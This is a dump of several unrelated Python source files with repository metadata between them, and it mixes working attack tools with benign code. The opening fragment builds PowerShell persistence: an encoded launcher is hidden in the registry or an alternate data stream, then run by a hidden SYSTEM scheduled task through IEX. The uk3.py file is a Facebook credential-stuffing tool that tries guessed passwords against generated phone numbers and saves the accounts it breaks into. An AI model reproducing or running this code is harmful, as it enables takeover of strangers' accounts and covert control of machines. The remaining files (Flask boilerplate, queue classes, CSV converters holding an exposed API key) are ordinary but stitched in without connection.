# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.payloads.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if onLogon != '':
script += "schtasks /Create /F /RU system /SC ONLOGON /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" OnLogon trigger."
elif idleTime != '':
script += "schtasks /Create /F /RU system /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /RU system /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
| [
"noreply@github.com"
] | fengjixuchui.noreply@github.com |
9fd7820797926af217ed080242855aeaa1af1ff0 | 325fbb141e7deb05ad2074d63caacb60d68a8faf | /project/__init__.py | 7f2e35ac0e008ec9a0b0ed5bfb67db356630ed6e | [] | no_license | nbry/flask-boilerplate | c56f2731cb3d84927d6ab327453c3b83fda17f51 | a4a6b991366f433161e8cee4fa406c144121f170 | refs/heads/master | 2023-04-22T03:06:50.433599 | 2021-05-10T06:24:30 | 2021-05-10T06:24:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,579 | py | from flask import Flask
# Blueprints (for routes)
from project.routes import all_blueprints
# # Extensions (MANUAL ADDITIONS HERE)
# # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
# from project.all_extensions import db
# *****************************
# APPLICATION FACTORY
# *****************************
def create_app(config_file=None):
"""
Create instance of a Flask app with configurations based on a provided
file as an argument. Returns the app.
"""
# Create Flask App Instance
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile(config_file)
# Bind blueprints
register_blueprints(app)
# # Initialize extensions and link to app
# # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
# initialize_extensions(app)
return app
# *****************************
# INITIALIZING EXTENSIONS
# *****************************
# # [USE THE FOLLOWING IF SETTING UP PROJECT WITH A DATABASE]:
# def initialize_extensions(app):
# """
# Pass Flask extensions to an instantiated Flask app.
# """
# db.init_app(app)
# *****************************
# REGISTERING BLUEPRINTS
# *****************************
def register_blueprints(app):
"""
Register all blueprints to an instantiated Flask application.
NOTE!! ENSURE project/routes/__init__.py is set up correctly!
All your blueprints must be imported into that file and put in a
list named all_blueprints.
"""
for blueprint in all_blueprints:
app.register_blueprint(blueprint)
| [
"nwbryant@umich.edu"
] | nwbryant@umich.edu |
27fe391210aaace5f53aa25edb65d2c5d35e4512 | 45c43d1d7520ef4683feea30cc89428cedb08e0e | /uk3.py | cea9950755ee4c33b9ecc4ae76c02f298440e8c9 | [] | no_license | chotobhaiback/uk3 | dce20a838972b1673df855962e2663288e1ca9de | c2d7ff71e4db22a87924e7458b92ea21fa6b5135 | refs/heads/master | 2022-12-14T20:25:51.312387 | 2020-09-03T09:00:22 | 2020-09-03T09:00:22 | 292,518,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,586 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m---------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m------------------------------------------
"""
####Logo####
logo1 = """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m---------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m-----------------------------------------
"""
logo2 = """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m----------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m-----------------------------------------
"""
CorrectPasscode = "a"
loop = 'true'
while (loop == 'true'):
passcode = raw_input("\033[1;92m[?] \x1b[1;97mPASSWORD \x1b[1;97m: ")
if (passcode == CorrectPasscode):
print """
\033[1;92mCORRECT
"""
loop = 'false'
else:
print "\033[1;91mWRONG"
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;93m[1]\x1b[1;94mStart cloning "
time.sleep(0.05)
print '\x1b[1;93m[0]\033[1;94m Exit'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;95m")
if peak =="":
print "\x1b[1;95mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;94m[1] Start Cracking'
time.sleep(0.05)
print '\x1b[1;94m[0] \033[1;93m Back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;95mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter (1st) any 2 digit mobile code Number"+'\n'
try:
k= raw_input("\033[1;96mCHOOSE : ")
print 'Enter (2nd) any 2 digit uk sim code'
try:
c = raw_input("\033[1;96mCHOOSE : ")
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;91m-'
xxx = str(len(id))
jalan ('\033[1;92m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;92mWait... Start Cracking...")
jalan ("\033[1;92mTo Stop Process Press Ctrl+z")
print 50* '\033[1;91m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="messi123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4= "london123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96mThanks me later
\033[1;96m my contacts
\033[1;95mFb\033[1;97mQaiserAbbas
\033[1;95myoutube\033[1;97mhttps://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | chotobhaiback.noreply@github.com |
1c22246d8eaaf0be1c4f1638d45fd225ca7a09fb | fe47186a51d47fcc61672ab16a2cda930306ad3d | /pybook/queue.py | 6cdac67fadccf059e3bce533fac09b2ed2fef135 | [] | no_license | mannyanebi/data-structures | 3845878e7e95717322e395987efaf0d19212beda | b7b9544ff9148aacda1ca3bb8c5e4067c2f5ccdf | refs/heads/master | 2023-02-18T14:42:34.549387 | 2021-01-20T10:30:22 | 2021-01-20T10:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,777 | py | """ List-based queue"""
class ListQueue:
def __init__(self):
self.items = []
self.size = 0
def enqueue(self, data):
self.items.insert(0, data)
self.size += 1
def dequeue(self):
data = self.items.pop()
self.size -= 1
return data
""" Stack-based queue """
class StackQueue:
def __init__(self):
self.inbound_stack = []
self.outbound_stack = []
def enqueue(self, data):
self.inbound_stack.append(data)
def dequeue(self):
if not self.outbound_stack:
while self.inbound_stack:
self.outbound_stack.append(self.inbound_stack.pop())
return self.outbound_stack.pop()
queue = StackQueue()
queue.enqueue(5)
queue.enqueue(6)
queue.enqueue(7)
print(queue.inbound_stack)
queue.dequeue()
print(queue.inbound_stack)
print(queue.outbound_stack)
queue.dequeue()
print(queue.outbound_stack)
""" Node-based queue """
class Node:
def __init__(self, data=None):
self.data = data
self.next = None
class Queue:
def __init__(self):
self.head = None
self.tail = None
self.count = 0
def enqueue(self, data):
new_node = Node(data)
if self.head is None:
self.head = new_node
self.tail = self.head
else:
new_node.prev = self.tail
self.tail.next = new_node
self.tail = new_node
self.count += 1
def dequeue(self):
current = self.head
if self.count == 1:
self.count -= 1
self.head = None
self.tail = None
elif self.count > 1:
self.head = self.head.next
self.head.prev = None
self.count -= 1
return current
""" Media player queue"""
from random import randint
class Track:
def __init__(self, title=None):
self.title = title
self.length = randint(5, 10)
import time
class MediaPlayerQueue(Queue):
def __init__(self):
super(MediaPlayerQueue, self).__init__()
def add_track(self, track):
self.enqueue(track)
def play(self):
while self.count > 0:
current_track_node = self.dequeue()
print("Now playing {}".format(current_track_node.data.title))
time.sleep(current_track_node.data.length)
track1 = Track("white whistle")
track2 = Track("butter butter")
track3 = Track("Oh black star")
track4 = Track("Watch that chicken")
track5 = Track("Don't go")
print(track1.length)
print(track2.length)
media_player = MediaPlayerQueue()
media_player.add_track(track1)
media_player.add_track(track2)
media_player.add_track(track3)
media_player.add_track(track4)
media_player.add_track(track5)
media_player.play()
| [
"achinonso@gmail.com"
] | achinonso@gmail.com |
f5e421b2c2cc53b922c6ad9815e5b4c19d3ccf93 | 0f9f73ad6415510c786df2fd5f134d2a3ea2c71f | /converters.py | 3c460042fbdad63e85631b436342ee787e848aa2 | [] | no_license | SemanticComputing/cemeteries-csv2rdf | 2ca226a88d40cc5a5e558b15e3c2c350613e7a8b | 6d8b406189a39e687b214a83077a3928c7cde125 | refs/heads/master | 2021-01-19T11:08:46.953041 | 2018-04-05T12:52:53 | 2018-04-05T12:52:53 | 87,931,235 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,426 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Converters for CSV cell data
"""
import datetime
import logging
import re
import requests
from rdflib import Graph, Literal
from slugify import slugify
from namespaces import *
log = logging.getLogger(__name__)
def convert_int(raw_value: str):
"""
Convert string value to integer if possible, if not, return original value
:param raw_value: original string value
:return: converted or original value
"""
if not raw_value:
return raw_value
try:
value = int(raw_value) # This cannot be directly converted on the DataFrame because of missing values.
log.debug('Converted int: %s' % raw_value)
return value
except (ValueError, TypeError):
log.warning('Invalid value for int conversion: %s' % raw_value)
return raw_value
def convert_dates(raw_date: str):
"""
Convert date string to iso8601 date
:param raw_date: raw date string from the CSV
:return: ISO 8601 compliant date if can be parse, otherwise original date string
"""
if not raw_date:
return raw_date
try:
date = datetime.datetime.strptime(str(raw_date).strip(), '%d/%m/%Y').date()
log.debug('Converted date: %s to %s' % (raw_date, date))
return date
except ValueError:
try:
date = datetime.datetime.strptime(str(raw_date).strip(), '%d.%m.%Y').date()
log.debug('Converted date: %s to %s' % (raw_date, date))
return date
except ValueError:
log.warning('Invalid value for date conversion: %s' % raw_date)
return raw_date
def convert_person_name(raw_name: str):
"""
Unify name syntax and split into first names and last name
:param raw_name: Original name string
:return: tuple containing first names, last name and full name
"""
re_name_split = \
r'([A-ZÅÄÖÜÉÓÁ/\-]+(?:\s+\(?E(?:NT)?[\.\s]+[A-ZÅÄÖÜÉÓÁ/\-]+)?\)?)\s*(?:(VON))?,?\s*([A-ZÅÄÖÜÉÓÁ/\- \(\)0-9,.]*)'
fullname = raw_name.upper()
namematch = re.search(re_name_split, fullname)
(lastname, extra, firstnames) = namematch.groups() if namematch else (fullname, None, '')
# Unify syntax for previous names
prev_name_regex = r'([A-ZÅÄÖÜÉÓÁ/\-]{2}) +\(?(E(?:NT)?[\.\s]+)([A-ZÅÄÖÜÉÓÁ/\-]+)\)?'
lastname = re.sub(prev_name_regex, r'\1 (ent. \3)', str(lastname))
lastname = lastname.title().replace('(Ent. ', '(ent. ')
firstnames = firstnames.title()
if extra:
extra = extra.lower()
lastname = ' '.join([extra, lastname])
fullname = lastname
if firstnames:
fullname += ', ' + firstnames
log.debug('Name %s was unified to form %s' % (raw_name, fullname))
original_style_name = ' '.join((lastname, firstnames)) if firstnames else lastname
if original_style_name.lower() != raw_name.lower():
log.warning('New name %s differs from %s' % (original_style_name, raw_name))
return firstnames, lastname, fullname
def create_event(uri_suffix, event_type, participant_prop, participant, participant_name, labels, timespan=None,
place=None, prop_sources=None, extra_information=None):
"""
Create an event or add information to an existing one (by using a previously used URI).
:param uri_suffix:
:param event_type: URIRef
:param participant_prop:
:param participant:
:param participant_name:
:param labels: list of label literals in different languages
:param timespan: timespan tuple (begin, end) or single date
:param place: string representing the target place
:param prop_sources:
:param extra_information: list of (predicate, object) tuples
"""
event = Graph()
uri = EVENTS_NS[uri_suffix]
event.add((uri, RDF.type, event_type))
event.add((uri, participant_prop, participant))
labels = (Literal(labels[0].format(name=participant_name), lang='fi'),
Literal(labels[1].format(name=participant_name), lang='en'))
for label in labels:
event.add((uri, SKOS.prefLabel, label))
# if event_source:
# event.add((uri, DC.source, event_source))
if extra_information:
for info in extra_information:
event.add((uri,) + info)
if timespan:
if type(timespan) != tuple:
timespan = (timespan, timespan)
timespan_uri = EVENTS_NS[uri_suffix + '_timespan']
label = (timespan[0] + ' - ' + timespan[1]) if timespan[0] != timespan[1] else timespan[0]
event.add((uri, CIDOC['P4_has_time-span'], timespan_uri))
event.add((timespan_uri, RDF.type, CIDOC['E52_Time-Span']))
event.add((timespan_uri, CIDOC.P82a_begin_of_the_begin, Literal(timespan[0], datatype=XSD.date)))
event.add((timespan_uri, CIDOC.P82b_end_of_the_end, Literal(timespan[1], datatype=XSD.date)))
event.add((timespan_uri, SKOS.prefLabel, Literal(label)))
if prop_sources:
for timespan_source in prop_sources:
event.add((timespan_uri, DC.source, timespan_source))
if place:
property_uri = CIDOC['P7_took_place_at']
event.add((uri, property_uri, place))
if prop_sources:
# TODO: Use singleton properties or PROV Ontology (https://www.w3.org/TR/prov-o/#qualifiedAssociation)
for place_source in prop_sources:
# USING (SEMI-)SINGLETON PROPERTIES TO DENOTE SOURCE
property_uri = DATA_NS['took_place_at_' + slugify(place) + '_' + slugify(place_source)]
event.add((property_uri, DC.source, place_source))
event.add((property_uri, RDFS.subClassOf, CIDOC['P7_took_place_at']))
return event
def strip_dash(raw_value: str):
return '' if raw_value.strip() == '-' else raw_value
def add_trailing_zeros(raw_value):
i = convert_int(raw_value)
return format(i, '03d')
# http://en.proft.me/2015/09/20/converting-latitude-and-longitude-decimal-values-p/
def dms2dd(degrees, minutes, seconds, direction):
dd = float(degrees) + float(minutes)/60 + float(seconds)/(60*60);
dd = round(dd, 8)
if direction == 'S' or direction == 'W':
dd *= -1
#print('converted: ' + str(dd))
return dd
def dd2dms(deg):
d = int(deg)
md = abs(deg - d) * 60
m = int(md)
sd = (md - m) * 60
return [d, m, sd]
def parse_coordinate(raw_value):
if raw_value == '' or raw_value == 'ei_ole' :
return None
# Convert xx.xx.xx.x to xx°xx'xx"
# strip whitespace
raw_value = "".join(raw_value.split())
if raw_value[2] == '.' or raw_value[2].isspace() or raw_value[2] == ',':
modified = list(raw_value)
# remove double periods
if modified[-1] == '.' and modified[-2] == '.':
modified = modified[:-2]
# remove periods from end
if modified[-1] == '.':
modified = modified[:-1]
modified[2] = u"\u00B0"
modified[5] = '\''
modified += '\"'
new_value = "".join(modified)
else:
return None
# Add direction
if not new_value.endswith(' N') and int(new_value[0:2]) > 59:
raw_value += ' N'
elif not new_value.endswith(' E') and int(new_value[0:2]) < 30:
new_value += ' E'
# parts = re.split('[^\d\w]+', dms)
parts = re.split('[^\d\w\.]+', str(new_value))
#print('original: ' + str(raw_value))
# remove double periods from seconds
if parts[2].count('.') > 1:
oldstr = parts[2]
newstr = oldstr[:3] + oldstr[4:]
parts[2] = newstr
return dms2dd(parts[0], parts[1], parts[2], parts[3])
def split_cemetery_name(raw_value):
parts = raw_value.split(' / ')
if len(parts) == 1:
# no former municipality
former_municipality = None
# municipality, name of the cemetery etc
current_municipality = raw_value.split(',')[0]
narc_name = raw_value
#else isinstance(parts, list):
else:
current_municipality = parts[0]
former_municipality = parts[1].split(',')[0]
narc_name = parts[1]
#else:
# current_municipality = parts.split(',')[0]
# if the municipality has not changed, should we add both
# former and current municipality?
# former_municipality = None
# narc_name = value)
return { 'current_municipality': current_municipality,
'former_municipality': former_municipality,
'narc_name': narc_name }
def geocode(raw_value):
GOOGLE_MAPS_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
if ' / ' in raw_value:
input_adr = raw_value.split(' / ')[0]
else:
input_adr = raw_value
params = {
'address': input_adr,
'sensor': 'false',
'region': 'fi',
'key': 'AIzaSyAz7aHBd-VrYm2T2neu8w0_TWy97otAb5I'
}
# Do the request and get the response data
req = requests.get(GOOGLE_MAPS_API_URL, params=params)
res = req.json()
geodata = dict()
# check if there are no results
if len(res['results']) == 0:
if (raw_value) == 'Tehtaankirkontie 5, 73500 Juankoski':
geodata['lat'] = 63.064402
geodata['lng'] = 28.329469
geodata['address'] = 'Tehtaankirkontie 5, 73500 Juankoski'
elif (raw_value) == 'Hiittistentie 2, 25940 Hiittinen':
geodata['lat'] = 59.891527
geodata['lng'] = 22.522370
geodata['address'] = 'Hiittistentie 2, 25940 Hiittinen'
elif (raw_value) == 'Mäntysaari, 47910 Hillosensalmi':
geodata['lat'] = 61.191018
geodata['lng'] = 26.762769
geodata['address'] = 'Mäntysaari, 47910 Hillosensalmi'
else:
print(input_adr)
print(res)
geodata['lat'] = 60.0
geodata['lng'] = 50.0
adr = 'empty'
geodata['address'] = adr
return(geodata)
else:
# Use the first result
result = res['results'][0]
geodata['lat'] = result['geometry']['location']['lat']
geodata['lng'] = result['geometry']['location']['lng']
adr = result['formatted_address'].rsplit(',', 1)[0] # remove country from address
geodata['address'] = adr
#print('{address}. (lat, lng) = ({lat}, {lng})'.format(**geodata))
return geodata
| [
"esko.ikkala@aalto.fi"
] | esko.ikkala@aalto.fi |
b68e3f57c78af07e7e4e65232453565ad87c02a7 | a5b66100762c0ca7076de26645ef1b732e0ee2d8 | /python_toolbox/combi/__init__.py | 40c9544dc3e488bf610098b9b0ef4a3c5a5d5772 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cool-RR/python_toolbox | 63400bbc004c63b32fe421b668a64bede4928e90 | cb9ef64b48f1d03275484d707dc5079b6701ad0c | refs/heads/master | 2022-01-26T14:41:29.194288 | 2021-12-25T06:49:40 | 2021-12-25T06:49:40 | 3,066,283 | 130 | 15 | NOASSERTION | 2021-12-25T06:49:41 | 2011-12-29T01:39:51 | Python | UTF-8 | Python | false | false | 582 | py | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
from python_toolbox.math_tools import binomial
from python_toolbox.nifty_collections import (Bag, OrderedBag, FrozenBag,
FrozenOrderedBag)
from .chain_space import ChainSpace
from .product_space import ProductSpace
from .map_space import MapSpace
from .selection_space import SelectionSpace
from .perming import (PermSpace, CombSpace, Perm, UnrecurrentedPerm, Comb,
UnrecurrentedComb, UnallowedVariationSelectionException)
| [
"ram@rachum.com"
] | ram@rachum.com |
98a40dfcf96e898fc04e6268b9f887385f2dd236 | 253d0d26137b5fe4b984c7ee2fc4db7079406d98 | /sessionproject2/manage.py | 02dd1ad7d15a83f193f378106e92c899b192052b | [] | no_license | vikashtiwary118/django-session-project2 | b3f7d06fcedb4e66380c28fefabbcb191e0301cd | 663e2d178953dbf4e0b1e85dfecc059f0bfe4682 | refs/heads/master | 2020-08-06T18:10:42.396779 | 2019-10-06T03:19:32 | 2019-10-06T03:19:32 | 213,102,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sessionproject2.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"tiwaryvikash118@gmail.com"
] | tiwaryvikash118@gmail.com |
